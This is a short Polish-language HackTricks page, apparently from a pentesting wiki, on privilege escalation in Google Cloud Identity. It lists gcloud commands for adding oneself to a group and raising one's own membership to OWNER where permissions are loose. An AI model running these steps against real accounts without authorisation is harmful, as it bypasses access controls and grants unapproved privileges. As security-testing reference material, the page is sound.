GCP - Cloudidentity Privesc

Support HackTricks

Cloudidentity

Aby uzyskać więcej informacji na temat usługi cloudidentity, sprawdź tę stronę:

Dodaj siebie do grupy

Jeśli twój użytkownik ma wystarczające uprawnienia lub grupa jest źle skonfigurowana, może być w stanie dodać się jako członek nowej grupy:

gcloud identity groups memberships add --group-email <email> --member-email <email> [--roles OWNER]
# If --roles isn't specified you will get MEMBER

Modyfikacja członkostwa w grupie

Jeśli twój użytkownik ma wystarczające uprawnienia lub grupa jest źle skonfigurowana, może być w stanie uczynić siebie WŁAŚCICIELEM grupy, której jest członkiem:

# Check the current membership level
gcloud identity groups memberships describe --member-email <email> --group-email <email>

# If not OWNER try
gcloud identity groups memberships modify-membership-roles --group-email <email> --member-email <email> --add-roles=OWNER
Wsparcie HackTricks

Last updated